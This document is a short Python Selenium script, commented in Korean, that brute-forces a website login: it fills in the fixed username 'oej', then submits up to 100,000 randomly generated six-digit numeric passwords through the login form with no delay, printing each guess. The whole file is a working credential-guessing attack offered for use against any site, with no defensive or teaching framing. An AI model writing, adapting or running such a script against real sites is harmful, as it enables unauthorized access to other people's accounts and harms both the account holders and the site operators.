from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import random
import string

# 크롬 드라이버 경로 설정
chrome_driver_path = "C:/Users/user/Desktop/chromedriver-win64/chromedriver.exe"
driver = webdriver.Chrome(executable_path=chrome_driver_path)
driver.get("https://anysite_you_want")

# 아이디 입력
id_input = driver.find_element_by_css_selector('input[type="text"][placeholder="Username"].ivu-input.ivu-input-large')
id_input.send_keys("oej")

# 비밀번호 생성 함수
def generate_password():
    return ''.join(random.choice(string.digits) for _ in range(6))

count=0

# 비밀번호 시도 횟수
num_attempts = 100000
for _ in range(num_attempts):
    password = generate_password()

    password_input = driver.find_element_by_css_selector('input[type="password"][placeholder="Password"].ivu-input.ivu-input-large')
   
    password_input.send_keys(password)

    login_button = driver.find_element_by_xpath("/html/body/div[3]/div[2]/div/div/div[2]/div/div/button")
    login_button.click() 
    password_input.clear()
    count+=1
    print(password,count)

    time.sleep(0)


time.sleep(5)
# 웹 드라이버 종료
#driver.quit()
